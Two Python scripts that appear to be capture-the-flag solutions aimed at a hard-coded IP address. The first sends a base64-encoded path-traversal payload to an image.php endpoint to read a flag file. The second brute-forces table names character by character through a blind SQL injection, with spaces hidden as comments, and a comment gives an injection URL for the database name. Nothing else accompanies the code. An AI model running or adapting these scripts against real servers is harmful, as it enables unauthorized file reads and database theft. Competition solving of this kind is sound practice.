import requests
import time
import base64

URL = 'http://183.129.189.60:10009/image.php'
timestamp = int(time.time())
payload = 'gqy.jpg/../../../../../flag'
params = {'t': timestamp, 'f': base64.b64encode(payload.encode('utf-8'))}

r = requests.get(url=URL, params=params)
print(r.text)

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import requests as req
import time as t
import base64 as b
import string
alpa = string.ascii_letters + string.digits
res = ''
#库名 利用limit注入 sqlidb
# http://183.129.189.60:10004/?id=1%27limit/**/1,1/**/PROCEDURE/**/ANALYSE(1)%23

#表名 flllaaaggg
payload = '''SELECT group_concat(table_name) FROM  sys.x$schema_flattened_keys WHERE table_schema='sqlidb' GROUP BY table_name limit 0,1'''

for i in range(1,100):
	for char in alpa:
		host = '''http://183.129.189.60:10004/?id=1'=(substr(({payload}),{i},1)='{char}')%23'''.format(payload=payload.replace(' ','/**/'), i=i, char=char)

		r = req.get(host)
		if r'admin666' in r.text:
			res += char
			print("found it: "+res)
			break
		t.sleep(0.2)